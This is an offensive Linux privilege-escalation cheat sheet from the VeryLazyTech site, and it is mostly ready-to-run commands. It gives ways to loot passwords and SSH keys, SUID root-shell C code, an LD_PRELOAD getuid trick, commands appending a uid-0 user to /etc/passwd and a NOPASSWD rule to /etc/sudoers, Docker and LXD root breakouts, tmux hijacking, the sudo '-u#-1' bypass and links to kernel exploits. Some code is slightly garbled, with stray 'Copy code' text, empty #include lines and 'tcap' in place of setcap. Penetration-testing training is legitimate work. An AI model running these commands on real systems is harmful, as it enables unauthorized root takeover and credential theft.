# Privilege escalation - Linux {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} Privilege escalation is a critical step in the post-exploitation phase, where attackers elevate their access to a higher privilege level. This guide will focus on practical techniques and commands to identify and exploit various privilege escalation vulnerabilities in Linux. It includes tools, methods for finding sensitive information, exploiting misconfigurations, and utilizing kernel vulnerabilities. Every method will have corresponding commands to enhance its practicality. *** ## **Tools** These tools are essential for finding and exploiting privilege escalation vulnerabilities: * **LinPEAS**: Privilege Escalation auditing script. ```bash wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ``` * **Linux Exploit Suggester**: Suggests potential exploits based on system vulnerabilities. ```bash wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh ``` * **Pspy**: Monitors processes without root access. ```bash wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 chmod +x pspy64 ./pspy64 ``` *** ## **Checklist** ### **System information:** * **Gather system information:** ```bash uname -a cat /etc/*release id ``` * **Check running processes:** ```bash ps aux ``` * **Check kernel version:** [#kernel-exploits](#kernel-exploits "mention") ```bash uname -r ``` * **List users on the system:** ```bash cat /etc/passwd ``` * **Check available shell history:** ```bash cat ~/.bash_history ``` ### **PATH Variable & Writable Folders** * **Check if any folder in the PATH is writable:** ```bash echo $PATH ls -ld $(echo $PATH | tr ":" "\n") | grep "w" ``` ### **Environment Variables** * **Check environment variables for sensitive information:** ```bash env ``` *** ### **Kernel Exploits** * **Search for kernel exploits using scripts (e.g., DirtyCow):** ```bash ./linux-exploit-suggester.sh ``` * **Check for specific kernel exploits like DirtyCow:** ```bash https://github.com/dirtycow/dirtycow.github.io ``` * **Check if the sudo version is vulnerable:** ```bash sudo -V ``` ### **Dmesg: Signature Verification Failed** Look for kernel errors or issues related to signature verification: ```bash dmesg | grep -i signature ``` *** ### **More System Enumeration** **Check System Information (Date, System Stats, CPU Info)** * **Date and Time: (**Helps you synchronize your actions with scheduled jobs or detect potential time-based misconfigurations**)** ```bash date ``` * **CPU info: (**Identifies the system architecture to tailor exploits to the specific processor type**)** ```bash cat /proc/cpuinfo ``` * **Check for printers: (**Identifies networked printers, which could be exploited for lateral movement or sensitive data interception**)** ```bash lpstat -p ``` * **Check for writable files:** ```bash find / -writable -type f 2>/dev/null ``` *** ## **Looting for Passwords** ### **Files Containing Passwords** Common files where passwords are stored: ```bash grep -r "password" /etc/* 2>/dev/null grep -r "PASSWORD" /etc/* 2>/dev/null ``` **Old Passwords in `/etc/security/opasswd`** ```bash cat /etc/security/opasswd ``` **Last Edited Files** ```bash find / -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r | head ``` **In-Memory Passwords** Dump memory to search for passwords: ```bash strings /dev/mem | grep -i password ``` *** ## **Find Sensitive Files** **SSH Key** Search for SSH keys on the system: ```bash find / -name "id_rsa" 2>/dev/null ``` *** ## **Scheduled Tasks** **Cron Jobs** Check cron jobs: ```bash bashCopy codecat /etc/crontab ls -la /etc/cron.* ls -la /var/spool/cron/crontabs ``` If you find a writable cron job, you can inject your own commands. **Systemd Timers** List systemd timers that could be manipulated: ```bash systemctl list-timers ``` *** ## **SUID** **Find SUID Binaries (**[**https://gtfobins.github.io/**](https://gtfobins.github.io/)**)** SUID binaries run with elevated privileges: ```bash find / -perm -4000 -type f 2>/dev/null ``` **Create a SUID Binary** If you can create a SUID binary, you can escalate privileges: ```c cCopy code#include #include int main() { setuid(0); system("/bin/bash"); return 0; } ``` Compile and set SUID: ```bash gcc -o suid_binary suid_binary.c chmod +s suid_binary ``` *** **Capabilities** **List Capabilities of Binaries** Linux capabilities allow binaries to perform privileged operations: ```bash getcap -r / 2>/dev/null ``` **Edit Capabilities** If you find writable binaries with capabilities: ```bash tcap cap_setuid+ep /path/to/binary ``` **Interesting Capabilities** Look for binaries with capabilities like `cap_setuid`, `cap_dac_override`, or `cap_sys_admin` that can help escalate privileges. *** ## **SUDO** ### **NOPASSWD** Look for sudo privileges without requiring a password: ```bash sudo -l ``` ### **LD\_PRELOAD and NOPASSWD** Use `LD_PRELOAD` to exploit vulnerable binaries: ```bash bashCopy codeecho 'int getuid() {return 0;}' > preload.c gcc -shared -o preload.so preload.c -fPIC sudo LD_PRELOAD=./preload.so /path/to/command ``` ### **Doas** Doas is an alternative to sudo. Check if it's configured: ```bash doas -s ``` *** **Writable Files** **Writable `/etc/passwd`** If `/etc/passwd` is writable, you can modify it to create a new user: ```bash echo 'hacker:x:0:0:hacker:/root:/bin/bash' >> /etc/passwd ``` **Writable `/etc/sudoers`** If writable, add a new sudo rule: ```bash echo 'hacker ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers ``` *** **NFS Root Squashing** If root squashing is disabled, mount the NFS share and escalate privileges: ```bash mount -o rw,vers=3 nfs_server:/share /mnt ``` *** **Shared Library Exploits** **ldconfig** Check for writable paths in `ldconfig`: ```bash ldconfig -p ``` **RPATH** RPATH allows binaries to specify search paths for libraries. If vulnerable, this can be exploited by injecting malicious libraries. *** **Docker and LXC/LXD** **Docker** If the user is part of the `docker` group, they can escalate privileges: ```bash docker run -v /:/mnt --rm -it alpine chroot /mnt sh ``` **LXC/LXD** Exploit LXD by importing an image: ```bash lxc image import ./rootfs.tar.xz --alias privesc lxc init privesc privesc-container -c security.privileged=true lxc start privesc-container lxc exec privesc-container /bin/sh ``` *** **Hijack TMUX Session** If a TMUX session is running as root, hijack it: ```bash tmux ls tmux attach -t ``` *** ## **Kernel Exploits** **CVE-2022-0847 (DirtyPipe)** Exploit DirtyPipe for privilege escalation: ```bash https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit ``` **CVE-2016-5195 (DirtyCow)** Exploit DirtyCow for privilege escalation: ```bash https://github.com/dirtycow/dirtycow.github.io ``` **CVE-2010-3904 (RDS)** RDS socket vulnerability: ```bash https://www.exploit-db.com/exploits/15285 ``` **CVE-2010-4258 (Full Nelson)** Full Nelson exploit for privilege escalation: ```bash https://www.exploit-db.com/exploits/15704 ``` **CVE-2019-14287** This exploit allows for privilege escalation if a misconfigured sudo is in place: ```bash sudo -u#-1 /bin/bash ``` **CVE-2012-0056 (Mempodipper)** Mempodipper is a kernel exploit for privilege escalation: ```bash https://www.exploit-db.com/exploits/18411 ```